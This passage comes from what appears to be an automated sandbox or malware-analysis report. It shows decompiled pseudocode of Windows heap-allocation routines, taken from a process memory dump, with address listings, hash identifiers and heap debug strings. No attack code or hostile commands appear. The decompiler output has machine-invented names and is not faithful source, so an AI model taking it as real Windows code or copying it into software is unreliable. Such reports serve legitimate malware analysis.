										E0109A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0109B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0109A830(_t553, _v64, _v24);
								_t286 = E01097D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E01097D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01131411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E01097D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E01097D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01131411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E010A174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0109B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E01097D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E011314FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E010999BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0109A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E010AABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                            0x0109a309
                                                                            0x0109a316
                                                                            0x0109a319
                                                                            0x0109a31d
                                                                            0x0109a32d
                                                                            0x0109a331
                                                                            0x010e1e0d
                                                                            0x010e1e10
                                                                            0x0109a3cb
                                                                            0x0109a3cb
                                                                            0x0109a3bd
                                                                            0x0109a3c3
                                                                            0x0109a3c3
                                                                            0x0109a33a
                                                                            0x010e1e17
                                                                            0x010e1e1b
                                                                            0x010e1e1d
                                                                            0x010e1e2f
                                                                            0x010e1e34
                                                                            0x010e1e36
                                                                            0x010e1e3c
                                                                            0x010e1e3c
                                                                            0x010e1e3c
                                                                            0x010e1e3c
                                                                            0x010e1e36
                                                                            0x010e1e42
                                                                            0x010e1e45
                                                                            0x010e1e47
                                                                            0x0109a3f8
                                                                            0x0109a3f8
                                                                            0x0109a3fb
                                                                            0x0109a3fd
                                                                            0x010e1e50
                                                                            0x0109a403
                                                                            0x0109a411
                                                                            0x0109a411
                                                                            0x0109a411
                                                                            0x0109a41e
                                                                            0x0109a420
                                                                            0x0109a424
                                                                            0x0109a427
                                                                            0x0109a7c9
                                                                            0x0109a7cd
                                                                            0x0109a7d2
                                                                            0x0109a7d9
                                                                            0x0109a7e0
                                                                            0x0109a7e3
                                                                            0x0109a7ed
                                                                            0x0109a7f3
                                                                            0x0109a7f9
                                                                            0x0109a7ff
                                                                            0x0109a802
                                                                            0x0109a807
                                                                            0x0109a809
                                                                            0x0109a809
                                                                            0x0109a809
                                                                            0x0109a80f
                                                                            0x0109a80f
                                                                            0x0109a812
                                                                            0x0109a81c
                                                                            0x0109a821
                                                                            0x0109a824
                                                                            0x0109a42d
                                                                            0x0109a42d
                                                                            0x0109a42d
                                                                            0x0109a42d
                                                                            0x0109a42d
                                                                            0x0109a436
                                                                            0x0109a43a
                                                                            0x0109a609
                                                                            0x0109a60d
                                                                            0x0109a612
                                                                            0x0109a616
                                                                            0x0109a61a
                                                                            0x010e1e57
                                                                            0x010e1e59
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1e5f
                                                                            0x0109a620
                                                                            0x0109a627
                                                                            0x010e1e64
                                                                            0x010e1e66
                                                                            0x010e1e6c
                                                                            0x010e1e72
                                                                            0x010e1e76
                                                                            0x010e1e95
                                                                            0x010e1e9a
                                                                            0x010e1e78
                                                                            0x010e1e8d
                                                                            0x010e1e92
                                                                            0x010e1ea0
                                                                            0x010e1ea5
                                                                            0x010e1eaa
                                                                            0x010e1eb2
                                                                            0x010e1eb6
                                                                            0x010e1eb9
                                                                            0x010e1eb9
                                                                            0x010e1ebe
                                                                            0x010e1ec2
                                                                            0x010e1ec2
                                                                            0x010e1e66
                                                                            0x0109a62d
                                                                            0x0109a633
                                                                            0x0109a636
                                                                            0x0109a63a
                                                                            0x0109a63c
                                                                            0x0109a640
                                                                            0x0109a642
                                                                            0x0109a644
                                                                            0x0109a644
                                                                            0x0109a644
                                                                            0x0109a64d
                                                                            0x0109a64d
                                                                            0x0109a651
                                                                            0x0109a655
                                                                            0x010e1eca
                                                                            0x010e1ed1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1ed7
                                                                            0x00000000
                                                                            0x0109a65b
                                                                            0x0109a669
                                                                            0x0109a66e
                                                                            0x0109a670
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a676
                                                                            0x0109a67b
                                                                            0x0109a680
                                                                            0x0109a682
                                                                            0x010e1f1a
                                                                            0x0109a688
                                                                            0x0109a688
                                                                            0x0109a688
                                                                            0x0109a68a
                                                                            0x0109a68d
                                                                            0x010e1f24
                                                                            0x010e1f2a
                                                                            0x010e1f31
                                                                            0x010e1f43
                                                                            0x010e1f43
                                                                            0x010e1f31
                                                                            0x0109a693
                                                                            0x0109a697
                                                                            0x0109a69d
                                                                            0x0109a6a0
                                                                            0x0109a6a6
                                                                            0x0109a6a8
                                                                            0x0109a6a8
                                                                            0x0109a6a8
                                                                            0x0109a6a8
                                                                            0x0109a6b2
                                                                            0x0109a6b7
                                                                            0x0109a6c1
                                                                            0x0109a6c6
                                                                            0x0109a6d2
                                                                            0x0109a6d9
                                                                            0x0109a6e3
                                                                            0x0109a6e6
                                                                            0x0109a6eb
                                                                            0x0109a6ed
                                                                            0x0109a6ed
                                                                            0x0109a6ed
                                                                            0x0109a6ed
                                                                            0x0109a6f3
                                                                            0x0109a6f8
                                                                            0x0109a702
                                                                            0x0109a70a
                                                                            0x0109a70e
                                                                            0x0109a71a
                                                                            0x0109a71e
                                                                            0x010e1fcb
                                                                            0x010e1fcf
                                                                            0x010e1fdd
                                                                            0x010e1fe3
                                                                            0x010e1fe3
                                                                            0x0109a724
                                                                            0x0109a728
                                                                            0x0109a72a
                                                                            0x0109a72d
                                                                            0x0109a737
                                                                            0x0109a73a
                                                                            0x0109a73c
                                                                            0x0109a742
                                                                            0x0109a748
                                                                            0x010e1f4d
                                                                            0x010e1f50
                                                                            0x010e1f56
                                                                            0x010e1f5c
                                                                            0x010e1f5f
                                                                            0x010e1f7e
                                                                            0x010e1f83
                                                                            0x010e1f61
                                                                            0x010e1f76
                                                                            0x010e1f7b
                                                                            0x010e1f89
                                                                            0x010e1f8e
                                                                            0x010e1f93
                                                                            0x010e1f94
                                                                            0x010e1f9a
                                                                            0x010e1f9c
                                                                            0x010e1f9e
                                                                            0x010e1fa1
                                                                            0x010e1fa1
                                                                            0x010e1fa6
                                                                            0x010e1fa6
                                                                            0x010e1f50
                                                                            0x0109a74e
                                                                            0x0109a751
                                                                            0x0109a754
                                                                            0x0109a75d
                                                                            0x0109a75e
                                                                            0x0109a762
                                                                            0x0109a767
                                                                            0x010e1faf
                                                                            0x010e1fb0
                                                                            0x010e1fb9
                                                                            0x010e1fbe
                                                                            0x010e1fc2
                                                                            0x010e1fc2
                                                                            0x0109a76d
                                                                            0x0109a76d
                                                                            0x0109a775
                                                                            0x0109a778
                                                                            0x0109a77d
                                                                            0x0109a77d
                                                                            0x0109a71e
                                                                            0x0109a782
                                                                            0x0109a787
                                                                            0x0109a789
                                                                            0x010e1ff3
                                                                            0x0109a78f
                                                                            0x0109a78f
                                                                            0x0109a78f
                                                                            0x0109a791
                                                                            0x0109a794
                                                                            0x010e1ffd
                                                                            0x010e2006
                                                                            0x010e200c
                                                                            0x010e2017
                                                                            0x010e2019
                                                                            0x010e2024
                                                                            0x010e2024
                                                                            0x010e2024
                                                                            0x010e2047
                                                                            0x010e2047
                                                                            0x010e200c
                                                                            0x0109a79a
                                                                            0x0109a79f
                                                                            0x0109a7a4
                                                                            0x0109a7a9
                                                                            0x0109a7ab
                                                                            0x010e205a
                                                                            0x0109a7b1
                                                                            0x0109a7b1
                                                                            0x0109a7b1
                                                                            0x0109a7b3
                                                                            0x0109a7b6
                                                                            0x00000000
                                                                            0x0109a7bc
                                                                            0x010e2066
                                                                            0x010e2068
                                                                            0x010e2073
                                                                            0x010e2073
                                                                            0x010e2073
                                                                            0x010e2078
                                                                            0x010e2079
                                                                            0x010e207d
                                                                            0x00000000
                                                                            0x010e207d
                                                                            0x0109a7b6
                                                                            0x0109a440
                                                                            0x0109a440
                                                                            0x0109a440
                                                                            0x0109a446
                                                                            0x0109a44c
                                                                            0x0109a44f
                                                                            0x0109a453
                                                                            0x0109a455
                                                                            0x010e20b3
                                                                            0x010e20b9
                                                                            0x010e20b9
                                                                            0x0109a45d
                                                                            0x0109a460
                                                                            0x0109a464
                                                                            0x0109a466
                                                                            0x0109a46b
                                                                            0x0109a46f
                                                                            0x0109a471
                                                                            0x0109a471
                                                                            0x0109a471
                                                                            0x0109a474
                                                                            0x0109a479
                                                                            0x0109a47d
                                                                            0x0109a47f
                                                                            0x010e2229
                                                                            0x010e222f
                                                                            0x0109a3c8
                                                                            0x0109a3c8
                                                                            0x0109a3ca
                                                                            0x0109a3ca
                                                                            0x00000000
                                                                            0x0109a3ca
                                                                            0x010e2235
                                                                            0x010e223a
                                                                            0x010e223a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2240
                                                                            0x010e2246
                                                                            0x010e224a
                                                                            0x010e2269
                                                                            0x010e226e
                                                                            0x010e224c
                                                                            0x010e2261
                                                                            0x010e2266
                                                                            0x010e2274
                                                                            0x010e2279
                                                                            0x010e227e
                                                                            0x010e2286
                                                                            0x010e2288
                                                                            0x010e228d
                                                                            0x010e228d
                                                                            0x010e2292
                                                                            0x010e2292
                                                                            0x010e2295
                                                                            0x010e2295
                                                                            0x00000000
                                                                            0x010e2295
                                                                            0x0109a485
                                                                            0x0109a489
                                                                            0x0109a48b
                                                                            0x0109a48f
                                                                            0x0109a493
                                                                            0x0109a497
                                                                            0x0109a49b
                                                                            0x0109a4bb
                                                                            0x0109a4bb
                                                                            0x0109a4bd
                                                                            0x0109a4ff
                                                                            0x0109a4ff
                                                                            0x0109a501
                                                                            0x0109a505
                                                                            0x0109a50f
                                                                            0x0109a517
                                                                            0x0109a51b
                                                                            0x0109a527
                                                                            0x0109a52b
                                                                            0x010e2182
                                                                            0x010e2185
                                                                            0x010e2193
                                                                            0x010e2199
                                                                            0x010e2199
                                                                            0x0109a531
                                                                            0x0109a535
                                                                            0x0109a538
                                                                            0x0109a548
                                                                            0x0109a54b
                                                                            0x0109a54d
                                                                            0x0109a553
                                                                            0x0109a559
                                                                            0x010e2100
                                                                            0x010e2103
                                                                            0x010e2109
                                                                            0x010e210f
                                                                            0x010e2112
                                                                            0x010e2131
                                                                            0x010e2136
                                                                            0x010e2114
                                                                            0x010e2129
                                                                            0x010e212e
                                                                            0x010e213c
                                                                            0x010e2141
                                                                            0x010e2147
                                                                            0x010e214d
                                                                            0x010e2151
                                                                            0x010e2154
                                                                            0x010e2154
                                                                            0x010e2159
                                                                            0x010e2159
                                                                            0x010e2103
                                                                            0x0109a55f
                                                                            0x0109a562
                                                                            0x0109a565
                                                                            0x0109a567
                                                                            0x010e2162
                                                                            0x0109a56d
                                                                            0x0109a574
                                                                            0x0109a575
                                                                            0x0109a579
                                                                            0x0109a57e
                                                                            0x010e2169
                                                                            0x010e216a
                                                                            0x010e2170
                                                                            0x010e2175
                                                                            0x010e2179
                                                                            0x010e2179
                                                                            0x0109a57e
                                                                            0x0109a584
                                                                            0x0109a58f
                                                                            0x0109a58f
                                                                            0x0109a52b
                                                                            0x0109a5ad
                                                                            0x0109a5bc
                                                                            0x0109a5c1
                                                                            0x0109a5c6
                                                                            0x0109a5cb
                                                                            0x0109a5cd
                                                                            0x010e21a9
                                                                            0x0109a5d3
                                                                            0x0109a5d3
                                                                            0x0109a5d3
                                                                            0x0109a5d5
                                                                            0x0109a5d8
                                                                            0x010e21b3
                                                                            0x010e21bc
                                                                            0x010e21c2
                                                                            0x010e21cd
                                                                            0x010e21cf
                                                                            0x010e21da
                                                                            0x010e21da
                                                                            0x010e21da
                                                                            0x010e21f7
                                                                            0x010e21f7
                                                                            0x010e21c2
                                                                            0x0109a5de
                                                                            0x0109a5e3
                                                                            0x0109a5e8
                                                                            0x0109a5ea
                                                                            0x010e220a
                                                                            0x0109a5f0
                                                                            0x0109a5f0
                                                                            0x0109a5f0
                                                                            0x0109a5f2
                                                                            0x0109a5f5
                                                                            0x010e2219
                                                                            0x010e221b
                                                                            0x010e208c
                                                                            0x010e208c
                                                                            0x010e208c
                                                                            0x010e2095
                                                                            0x010e2096
                                                                            0x010e2097
                                                                            0x010e2098
                                                                            0x010e20a4
                                                                            0x010e20a5
                                                                            0x010e20a9
                                                                            0x010e20a9
                                                                            0x00000000
                                                                            0x0109a5f5
                                                                            0x0109a4bf
                                                                            0x0109a4d3
                                                                            0x0109a4d8
                                                                            0x0109a4da
                                                                            0x010e1ede
                                                                            0x010e1ede
                                                                            0x010e1ee4
                                                                            0x010e1ee9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1f07
                                                                            0x00000000
                                                                            0x010e1f07
                                                                            0x0109a4e0
                                                                            0x0109a4e5
                                                                            0x0109a4e7
                                                                            0x010e20cb
                                                                            0x0109a4ed
                                                                            0x0109a4ed
                                                                            0x0109a4ed
                                                                            0x0109a4f2
                                                                            0x0109a4f5
                                                                            0x010e20d5
                                                                            0x010e20de
                                                                            0x010e20e4
                                                                            0x010e20f6
                                                                            0x010e20f6
                                                                            0x010e20e4
                                                                            0x0109a4fb
                                                                            0x00000000
                                                                            0x0109a4fb
                                                                            0x0109a4a1
                                                                            0x0109a4a4
                                                                            0x0109a4a8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a4aa
                                                                            0x0109a4ac
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a4b2
                                                                            0x0109a4b5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a4b5
                                                                            0x0109a43a
                                                                            0x0109a340
                                                                            0x0109a346
                                                                            0x0109a600
                                                                            0x00000000
                                                                            0x0109a600
                                                                            0x0109a34f
                                                                            0x0109a351
                                                                            0x0109a358
                                                                            0x0109a3c6
                                                                            0x00000000
                                                                            0x0109a371
                                                                            0x0109a37a
                                                                            0x0109a37f
                                                                            0x0109a382
                                                                            0x0109a384
                                                                            0x0109a394
                                                                            0x00000000
                                                                            0x0109a396
                                                                            0x0109a399
                                                                            0x0109a3a7
                                                                            0x0109a3b0
                                                                            0x0109a3b4
                                                                            0x0109a3bb
                                                                            0x0109a3d2
                                                                            0x0109a3da
                                                                            0x0109a3df
                                                                            0x0109a3e1
                                                                            0x0109a3e5
                                                                            0x0109a3ea
                                                                            0x0109a3f0
                                                                            0x0109a3f0
                                                                            0x0109a3e1
                                                                            0x00000000
                                                                            0x0109a3bb
                                                                            0x0109a394

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-523794902
                                                                            • Opcode ID: 8e80bf9b0859ce92757f3d8fc48f8217b80a77587da1bae2250da755f362e723
                                                                            • Instruction ID: eaa71ef219805a42634dfcc3c3899cb8a7fbc8db3a5c6b6271f34bade97db166
                                                                            • Opcode Fuzzy Hash: 8e80bf9b0859ce92757f3d8fc48f8217b80a77587da1bae2250da755f362e723
                                                                            • Instruction Fuzzy Hash: 4A42CD31608741DFDB15DF29C898A6ABBE5FF98204F0489ADF8C68B352D734D981CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01132D82, Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 64%
                                                                            			E01132D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1150e80);
				E010CD0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E010740E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E011330C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E0107B150();
						} else {
							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E0107B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E0108EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01134496(_t181, 0);
						_t177 = L01094620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E011349A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0112FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E01071F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E010A16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01134496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x1166360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x1166364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1166366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E0107B150();
								} else {
									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0111D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E0107B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E0107B150();
								} else {
									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E0107B150("Just allocated block at %p for %Ix bytes\n",  *0x1166360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x1166378 = 1;
									 *0x11660c0 = 0;
									asm("int3");
									 *0x1166378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x1165708; // 0x0
					 *0x116b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E010CD130(0, _t177, _t181);
				}
			}





















                                                                            0x01132d82
                                                                            0x01132d84
                                                                            0x01132d89
                                                                            0x01132d8e
                                                                            0x01132d90
                                                                            0x01132d92
                                                                            0x01132d97
                                                                            0x01132d9a
                                                                            0x01132da4
                                                                            0x01132dc0
                                                                            0x01132dc3
                                                                            0x01132dd1
                                                                            0x01132dd6
                                                                            0x01132dd8
                                                                            0x011330a7
                                                                            0x011330a7
                                                                            0x011330aa
                                                                            0x011330aa
                                                                            0x011330ad
                                                                            0x011330b4
                                                                            0x00000000
                                                                            0x011330b9
                                                                            0x01132de3
                                                                            0x01132de8
                                                                            0x01132deb
                                                                            0x01132dee
                                                                            0x01132df1
                                                                            0x01132df3
                                                                            0x01132dfb
                                                                            0x01132dfb
                                                                            0x01132df5
                                                                            0x01132df5
                                                                            0x01132df5
                                                                            0x01132e04
                                                                            0x01132e0a
                                                                            0x01132e0d
                                                                            0x01132e11
                                                                            0x01132e11
                                                                            0x01132e12
                                                                            0x01132e15
                                                                            0x01132e18
                                                                            0x01132e1a
                                                                            0x01133027
                                                                            0x01133027
                                                                            0x0113302d
                                                                            0x01133030
                                                                            0x0113304f
                                                                            0x01133054
                                                                            0x01133032
                                                                            0x01133047
                                                                            0x0113304c
                                                                            0x0113305a
                                                                            0x01133063
                                                                            0x00000000
                                                                            0x01132e20
                                                                            0x01132e20
                                                                            0x01132e23
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01132e29
                                                                            0x01132e2b
                                                                            0x01132e47
                                                                            0x01132e2d
                                                                            0x01132e33
                                                                            0x01132e38
                                                                            0x01132e3f
                                                                            0x01132e42
                                                                            0x01132e42
                                                                            0x01132e4e
                                                                            0x01132e5d
                                                                            0x01132e5f
                                                                            0x01132e62
                                                                            0x01132e66
                                                                            0x01132e6b
                                                                            0x01132e6d
                                                                            0x00000000
                                                                            0x01132e73
                                                                            0x01132e73
                                                                            0x01132e76
                                                                            0x01132e7a
                                                                            0x01132e83
                                                                            0x01132e83
                                                                            0x01132e83
                                                                            0x01132e85
                                                                            0x01132e87
                                                                            0x01132e8a
                                                                            0x01132e8d
                                                                            0x01132e92
                                                                            0x01132e9c
                                                                            0x01132e9f
                                                                            0x01132ea1
                                                                            0x01132ea2
                                                                            0x01132ea6
                                                                            0x01132ea6
                                                                            0x01132e9f
                                                                            0x01132eab
                                                                            0x01132eaf
                                                                            0x01132edf
                                                                            0x01132ee2
                                                                            0x01132ee5
                                                                            0x01132eb1
                                                                            0x01132eb3
                                                                            0x01132eb8
                                                                            0x01132ebd
                                                                            0x01132ec4
                                                                            0x01132ed6
                                                                            0x01132ec6
                                                                            0x01132ec7
                                                                            0x01132ecc
                                                                            0x01132ecf
                                                                            0x01132ed2
                                                                            0x01132ed2
                                                                            0x01132ed9
                                                                            0x01132ed9
                                                                            0x01132ee8
                                                                            0x01132eeb
                                                                            0x01132eef
                                                                            0x01132ef2
                                                                            0x01132efe
                                                                            0x01132f04
                                                                            0x01132f04
                                                                            0x01132f04
                                                                            0x01132f06
                                                                            0x01132f0d
                                                                            0x01132f0f
                                                                            0x01132f13
                                                                            0x01132f13
                                                                            0x01132f1b
                                                                            0x01132f21
                                                                            0x01132f27
                                                                            0x01132f95
                                                                            0x01132f98
                                                                            0x01132f9b
                                                                            0x01132fa0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01132fa6
                                                                            0x01132fa9
                                                                            0x01132fac
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01132fb2
                                                                            0x01132fb9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01132fc3
                                                                            0x01132fca
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01132fd0
                                                                            0x01132fd6
                                                                            0x01132fd9
                                                                            0x01132ff8
                                                                            0x01132ffd
                                                                            0x01132fdb
